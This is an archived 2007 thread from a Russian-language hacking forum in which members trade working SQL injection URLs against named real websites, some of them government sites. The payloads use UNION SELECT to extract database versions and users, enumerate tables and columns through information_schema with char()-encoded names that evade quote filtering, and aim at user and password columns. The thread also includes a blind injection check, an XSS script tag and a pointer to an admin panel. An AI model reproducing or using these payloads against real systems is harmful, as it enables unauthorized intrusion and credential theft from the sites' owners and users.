HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 07.06.2007, 15:25
alextoun
Постоянный
Регистрация: 07.05.2006
Сообщений: 732
Провел на форуме:
7910701

Репутация: 811


Отправить сообщение для alextoun с помощью ICQ
По умолчанию

Цитата:
http://www.propovednik.ru/index.php?page=-1+union+select+1,2,3,version(),5,6,7/*
Цитата:
http://www.propovednik.ru/index.php?page=-1+union+select+1,2,3,table_name,5,6,7+from+informa tion_schema.tables+limit+6,1/*
профайл
http://www.propovednik.ru/admin.php
админка
 
Ответить с цитированием

  #2  
Старый 07.06.2007, 15:48
_GaLs_
Постоянный
Регистрация: 21.04.2006
Сообщений: 540
Провел на форуме:
1310036

Репутация: 726


Отправить сообщение для _GaLs_ с помощью ICQ
По умолчанию

_http://www.marumi-filter.ru/shop/?id=userid='
_http://www.avia.ru/safety/?id=+union+select+1,2,3,4,5,6,7,8,9,0,1/*
_http://www.akademokna.ru/pages.php?id='+union+select+1,2,3,4,5,5,6,7,8,9,0, 1,2,3,4,5/*
 
Ответить с цитированием

  #3  
Старый 07.06.2007, 17:19
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


Cool

Цитата:
Сообщение от _GaLs_  
http://www.akademokna.ru/pages.php?id='+union+select+1,2,3,4,5,5,6,7,8,9,0, 1,2,3,4,5/*
Мм.....где ты подобрал?
Код:
http://www.akademokna.ru/pages.php?id=-2+union+select+1,concat_ws(char(58),user(),database(),version())/*
 
Ответить с цитированием

  #4  
Старый 07.06.2007, 16:21
CRL
Участник форума
Регистрация: 21.10.2006
Сообщений: 171
Провел на форуме:
2902967

Репутация: 413
Отправить сообщение для CRL с помощью ICQ
По умолчанию

Но ведь столбцы то не подобранны как бы... Ни в третей, ни во второй.

Последний раз редактировалось CRL; 07.06.2007 в 16:25..
 
Ответить с цитированием

  #5  
Старый 07.06.2007, 19:39
alextoun
Постоянный
Регистрация: 07.05.2006
Сообщений: 732
Провел на форуме:
7910701

Репутация: 811


Отправить сообщение для alextoun с помощью ICQ
По умолчанию

Цитата:
http://www.bankdelo.ru/kodecs/index.php?page=-1+union+select+version(),2,3,4/*
по пассам и юзерам подобрать можно т.к база 4-ой версии
 
Ответить с цитированием

  #6  
Старый 07.06.2007, 22:12
alextoun
Постоянный
Регистрация: 07.05.2006
Сообщений: 732
Провел на форуме:
7910701

Репутация: 811


Отправить сообщение для alextoun с помощью ICQ
По умолчанию

Цитата:
http://www.zgia.zp.ua/index.php?page=-1+union+select+version(),2,3,4,5/*
5-ая
Цитата:
http://www.zgia.zp.ua/index.php?page=-1+union+select+column_name,2,3,4,5+from+informatio n_schema.columns+where+table_name=char(117,115,101 ,114)+limit+0,1/*
кавычки фильтруются, поэтому в аски кодах название таблицы, и так же перебор по лимитам

Цитата:
http://www.zgia.zp.ua/index.php?page=-1+union+select+column_name,2,3,4,5+from+informatio n_schema.columns+where+table_name=char(117,115,101 ,114)+limit+2,1/*
пассы

Цитата:
http://www.zgia.zp.ua/index.php?page=-1+union+select+column_name,2,3,4,5+from+informatio n_schema.columns+where+table_name=char(117,115,101 ,114)+limit+1,1/*
юзеры
 
Ответить с цитированием

  #7  
Старый 08.06.2007, 01:55
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


По умолчанию

Код:
http://biomolecula.ru/?page=content&id=-74+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9/*
Код:
http://www.impactsoft.ru/clients.php?razdel_id=1+union+select+1,AES_DECRYPT(AES_ENCRYPT(convert(concat_ws(0x3a,version(),database(),user())+using+cp1251),0x71),0x71),3,4,5,6,7,8,9/*
 
Ответить с цитированием

  #8  
Старый 08.06.2007, 14:08
Пчел
Новичок
Регистрация: 17.05.2007
Сообщений: 13
Провел на форуме:
2036698

Репутация: 20
По умолчанию

Код:
http://www.cebucity.gov.ph/?pageno=12&bac=-12345+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*

Код:
http://www.chubut.gov.ar/tramites/descripcion_imprimir.php?id=-12345+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
 
Ответить с цитированием

  #9  
Старый 08.06.2007, 16:31
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546

Репутация: 1327
Отправить сообщение для _Pantera_ с помощью ICQ
По умолчанию

Код:
http://ethology.ru/humor/?id=-1+union+select+1,2,3,version(),5/*
Код:
http://happyland.ru/brands.php?id=-2+union+select+1,version(),3,'<script>alert()</script>',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
 
Ответить с цитированием

  #10  
Старый 08.06.2007, 17:24
Joker-jar
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659

Репутация: 646


Отправить сообщение для Joker-jar с помощью ICQ
По умолчанию

Код:
http://www.kaosweaver.com/extensions/details.php?id=1+and+ascii(lower(substring(version(),1,1)))=0x34/*
MySQL 4.x
лень подбирать столбцы
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ